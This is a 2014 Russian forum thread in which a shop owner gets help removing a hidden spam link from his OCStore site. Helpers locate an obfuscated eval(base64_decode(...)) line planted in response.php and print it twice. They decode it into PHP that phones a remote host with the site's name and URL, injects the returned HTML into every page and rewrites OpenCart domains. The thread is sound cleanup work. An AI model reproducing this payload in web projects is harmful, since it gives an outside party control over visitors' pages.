[Решено] Убрать opencart из кода.

Тема в разделе "OpenCart", создана пользователем Дмитрич, 23 май 2014.

Статус темы:
Закрыта.
  1. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Здравствуйте!
    Гугл пишет, что одно из самых популярных ключевых слов моего сайта это "opencart". На 8 месте!
    Я в футере ссылку убрал давно, но в коде каждой страницы в конце есть следующие строки, которые не могу убрать:
    <!-- Do not remove this code -->
    <div style="position:fixed;bottom:0px;left:0px;"><a href="http://opencartcms.ru"><img alt="OpenCart" title="OpenCart" width="5" height="5" src="http://s020.radikal.ru/i709/1403/b4/de65d43d36f2.png"><span style="display:block;width:5px;height:5px;text-indent:-9999px;">OpenCart</span></a></div><!-- Do not remove this code -->
    </
    body></html>

    Не могу найти откуда он выводится, не могу убрать. А ведь это не только ключевое слово, но ещё и скрытый текст, ссылка.
    Помогите, пожалуйста, удалить.
    У меня OCStore V1.5.5.1.2.
     
  2. VeryGood

    VeryGood

    Регистрация:
    11 дек 2012
    Сообщения:
    216
    Симпатии:
    54
    А что мешает удалить этот мусор? Почему не можете убрать?
     
  3. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Да не могу найти откуда это выводится. В файле футера этого нет, задавал поиск по всем файлам магазина - тоже нет.
     
  4. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    vqmod есть? по файлам vqmoda искали? чем искали?
     
    Дмитрич нравится это.
  5. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Мусор был и до установки vqmoda. Искал через ТоталКомандер.
    Может ссылку на сайт дать или нельзя здесь?
     
  6. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    А попробуйте поискать по фразе
    Код:
    eval(base64_decode
    Много ли он найдет подобных файлов?
     
    Дмитрич нравится это.
  7. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    system/library/response.php
    Больше нет.
     
  8. VeryGood

    VeryGood

    Регистрация:
    11 дек 2012
    Сообщения:
    216
    Симпатии:
    54
    Вы бы залили куда файлы, а мы изучим, вдруг что найдем.
     
  9. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    Скопируйте сюда этот сюда этот код весь.

    С большой вероятностью это именно то, что нужно, удалив это все добро - избавитесь от проблемы.

    Скорее всего функция вида
    Код:
    $ouput = eval(base64_decode('ТУТ НАБОР БУКВ'));
     
    Дмитрич нравится это.
  10. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Какие именно?
    --- Добавлено, 23 май 2014 ---
     
    Последнее редактирование: 23 май 2014
  11. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    Ну вот, перекодируем вот это
    Код:
    $ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
    получаем вот это
    Код:
    function get_page($url){
            $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
            $ch=curl_init();
            curl_setopt ($ch, CURLOPT_URL,$url );
            curl_setopt($ch, CURLOPT_USERAGENT, $agent);
            curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt ($ch,CURLOPT_VERBOSE,false);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $page=curl_exec($ch);
            $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            switch($httpcode){
                    case '200':
                            return $page;
                    break;
                    case '404';
                            return false;
                    break;
            }
    }
    
    if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
    $find = array("</body>", "</html>", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
    $replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
    $ouput = str_replace($find, $replace, $ouput);
    ini_set("display_errors","off");
    error_reporting(0);
    echo $ouput;}
    else {
    echo $ouput;
    }
     
    Дмитрич нравится это.
  12. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Ого, а можно его просто удалить или закомментировать? Что этот код кроме мусора даёт - не понимаю?
     
  13. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    Удаляйте, и потом проверьте, если ли строки из первого поста в коде.
     
    Дмитрич нравится это.
  14. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Сайт не грузит. Подскажите, пожалуйста, как вырезать верно?

    public function output() {
    if ($this->output) {
    if ($this->level) {
    $ouput = $this->compress($this->output, $this->level);
    } else {
    $ouput = $this->output;
    }
    if (!headers_sent()) {
    foreach ($this->headers as $header) {
    header($header, true);
    }
    }
    $ouput = eval(base64_decode('.......
    }
    }
     
  15. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    Вырежите просто строку
    Код:
    $ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
     
  16. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Это я в первую очередь пробовал. Сайт не грузит.
    А что там за проверка в функции? Может её нужно пройти и тогда не будет запроса?
     
  17. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    Попробуйте тогда заменить этот файл оригинальным файлом Opencart или OcStore, смотря чего там у Вас стоит.

    Вот оригинальный файл response.php от OcStore, можете скопировать это

    Код:
    <?php
    class Response {
        private $headers = array();
        private $level = 0;
        private $output;
       
        public function addHeader($header) {
            $this->headers[] = $header;
        }
    
        public function redirect($url) {
            header('Location: ' . $url);
            exit;
        }
       
        public function setCompression($level) {
            $this->level = $level;
        }
           
        public function setOutput($output) {
            $this->output = $output;
        }
    
        private function compress($data, $level = 0) {
            if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
                $encoding = 'gzip';
            }
    
            if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
                $encoding = 'x-gzip';
            }
    
            if (!isset($encoding)) {
                return $data;
            }
    
            if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
                return $data;
            }
    
            if (headers_sent()) {
                return $data;
            }
    
            if (connection_status()) {
                return $data;
            }
           
            $this->addHeader('Content-Encoding: ' . $encoding);
    
            return gzencode($data, (int)$level);
        }
    
        public function output() {
            if ($this->output) {
                if ($this->level) {
                    $ouput = $this->compress($this->output, $this->level);
                } else {
                    $ouput = $this->output;
                }   
                   
                if (!headers_sent()) {
                    foreach ($this->headers as $header) {
                        header($header, true);
                    }
                }
               
                echo $ouput;
            }
        }
    }
    ?>
     
    Дмитрич нравится это.
  18. Дмитрич

    Дмитрич

    Регистрация:
    10 апр 2014
    Сообщения:
    182
    Симпатии:
    23
    Огромное спасибо, у меня был исходный OCStore V1.5.5.1.2, заменил всё работает и мусора нет этого.
    Не понимаю как могло это ко мне попасть...
     
  19. gatsby

    gatsby

    Регистрация:
    27 дек 2012
    Сообщения:
    142
    Симпатии:
    75
    При установке какого-нибудь модуля (шаблона), внимательно проверяйте, если модуль (шаблон) требует замены файлов.
     
    Дмитрич нравится это.
  20. Zulus

    Zulus Команда форума

    Регистрация:
    20 дек 2012
    Сообщения:
    682
    Симпатии:
    686
    1) Возможно вы качали от сюда:
    тогда эти "молодчики" и внедрили свою рекламу.
    2) Может скачали релиз с вредоносным кодом.

    Скорее всего первый вариант.
    Качайте из проверенных источников. Ну и после установки опенкарта, или любого модуля не ленитесь проверять на скрытые ссылки.
     
    Дмитрич нравится это.
Статус темы:
Закрыта.